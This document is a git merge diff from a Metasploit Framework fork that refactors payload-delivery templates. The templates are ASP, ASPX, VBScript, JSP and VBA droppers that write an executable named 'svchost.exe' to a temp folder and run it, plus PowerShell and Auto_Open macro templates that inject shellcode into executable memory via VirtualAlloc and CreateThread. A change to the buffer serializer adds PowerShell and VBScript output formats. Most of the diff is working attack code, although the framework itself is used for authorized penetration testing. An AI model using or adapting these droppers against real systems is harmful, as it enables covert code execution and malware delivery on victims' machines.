Merge branch 'exe-template-refactor' of https://github.com/shellster/metasploit-framework into exe-template-refactor

Author: root

data/templates/scripts/to_exe_asp.asp.template renamed to data/templates/scripts/to_exe.asp.template

@@ -1,6 +1,7 @@
-<%
+<%% @language="VBScript" %%>
+<%% 
 	Sub %{var_func}()
-		%{var_bytes}=Chr(%{exe[0]})%{var_shellcode}
+		%{var_shellcode}
 		Dim %{var_obj}
 		Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
 		Dim %{var_stream}
@@ -20,4 +21,4 @@
 	End Sub
 
 	%{var_func}
-%>
+%%>

data/templates/scripts/to_exe_aspx.aspx.template renamed to data/templates/scripts/to_exe.aspx.template

@@ -1,10 +1,9 @@
-<%@ Page Language="C#" AutoEventWireup="true" %>
-<%@ Import Namespace="System.IO" %>
+<%%@ Page Language="C#" AutoEventWireup="true" %%>
+<%%@ Import Namespace="System.IO" %%>
 <script runat="server">
 	protected void Page_Load(object sender, EventArgs e)
 	{
-		StringBuilder %{var_file} = new StringBuilder();
-		%{var_file}.Append("\x%{exe[0].to_s(16)}%{shellcode}");
+		%{shellcode}
 		string %{var_tempdir} = Path.GetTempPath();
 		string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
 		string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");
@@ -15,10 +14,7 @@
 
 		try
 		{
-			foreach (char %{var_iterator} in %{var_file}.ToString())
-			{
-				fs.WriteByte(Convert.ToByte(%{var_iterator}));
-			}
+			fs.Write(%{var_file}, 0, %{var_file}.Length);
 		}
 		finally
 		{

data/templates/scripts/to_exe_vba.vb.template renamed to data/templates/scripts/to_exe.vba.template

@@ -43,14 +43,14 @@ Sub %{func_name1}()
 			%{var_index} = 1
 			While (%{var_index} < Len(%{var_stemp}))
 				%{var_btemp} = Mid(%{var_stemp},%{var_index},4)
-				#Put %{var_fhand}, , %{var_btemp}
+				Put #%{var_fhand}, , %{var_btemp}
 				%{var_index} = %{var_index} + 4
 			Wend
 		ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then
 			%{var_gotmagic} = True
 		End If
 	Next
-	Close %{var_fhand}
+	Close #%{var_fhand}
 	%{func_name2}(%{var_fname})
 End Sub
 
@@ -77,4 +77,5 @@ End Sub
 '*
 '**************************************************************
 
-%{var_magic}%{data}
+%{var_magic}
+%{data}

data/templates/scripts/to_exe_vbs.vb.template renamed to data/templates/scripts/to_exe.vbs.template

@@ -1,5 +1,5 @@
 Function %{var_func}()
-	%{var_bytes}=Chr(%{exe[0]})%{var_shellcode}
+%{var_shellcode}
 
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")

data/templates/scripts/to_jsp_war.war.template renamed to data/templates/scripts/to_exe_jsp.war.template

@@ -1,5 +1,5 @@
-<%@ page import="java.io.*" %>
-<%
+<%%@ page import="java.io.*" %%>
+<%%
 	String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
 	String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
 	String %{var_data} = "";
@@ -46,4 +46,4 @@
 	{
 		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
 	}
-%>
+%%>

data/templates/scripts/to_vba.vb.template renamed to data/templates/scripts/to_mem.vba.template

@@ -15,7 +15,7 @@ Sub Auto_Open()
 #Else
 	Dim  %{var_rwxpage} As Long, %{var_res} As Long
 #EndIf
-	%{var_myArray} = Array(%{bytes})
+	%{bytes}
 	%{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40)
 	For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray})
 		%{var_myByte} = %{var_myArray}(%{var_offset})

data/templates/scripts/to_win32pe_psh_net.ps1.template renamed to data/templates/scripts/to_mem_dotnet.ps1.template

@@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
 $%{var_compileParams}.GenerateInMemory = $True
 $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
 
-[Byte[]]$%{var_code} = 0x%{code[0].to_s(16)}%{shellcode}
+%{shellcode}
 
 $%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
 if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }

data/templates/scripts/to_mem_old.ps1.template

@@ -0,0 +1,26 @@
+$%{var_syscode} = @"
+[DllImport("kernel32.dll")]
+public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+[DllImport("msvcrt.dll")]
+public static extern IntPtr memset(IntPtr dest, uint src, uint count);
+"@
+
+$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
+
+%{shellcode}
+
+$%{var_size} = 0x1000
+
+if ($%{var_code}.Length -gt 0x1000) {
+	$%{var_size} = $%{var_code}.Length
+}
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,$%{var_size},0x40)
+
+for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
+	$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1)
+}
+
+$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
+

data/templates/scripts/to_win32pe_psh.ps1.template

@@ -16,7 +16,7 @@ module Buffer
 
 	#
 	# Serializes a buffer to a provided format.  The formats supported are raw,
-	# ruby, perl, bash, c, js_be, js_le and java
+	# ruby, perl, bash, c, js_be, js_le, java and psh
 	#
 	def self.transform(buf, fmt = "ruby")
 		case fmt
@@ -39,6 +39,12 @@ def self.transform(buf, fmt = "ruby")
 				buf = Rex::Text.to_unescape(buf, ENDIAN_LITTLE)
 			when 'java'
 				buf = Rex::Text.to_java(buf)
+			when 'powershell', 'ps1'
+				buf = Rex::Text.to_powershell(buf)
+			when 'vbscript'
+				buf = Rex::Text.to_vbscript(buf)
+			when 'vbapplication'
+				buf = Rex::Text.to_vbapplication(buf)
 			else
 				raise ArgumentError, "Unsupported buffer format: #{fmt}", caller
 		end
@@ -78,7 +84,20 @@ def self.comment(buf, fmt = "ruby")
 	# Returns the list of supported formats
 	#
 	def self.transform_formats
-		['raw','ruby','rb','perl','pl','bash','sh','c','csharp','js_be','js_le','java','python','py']
+		['raw',
+		'ruby','rb',
+		'perl','pl',
+		'bash','sh',
+		'c',
+		'csharp',
+		'js_be',
+		'js_le',
+		'java',
+		'python','py',
+		'powershell','ps1',
+		'vbscript',
+		'vbapplication'
+		]
 	end
 
 end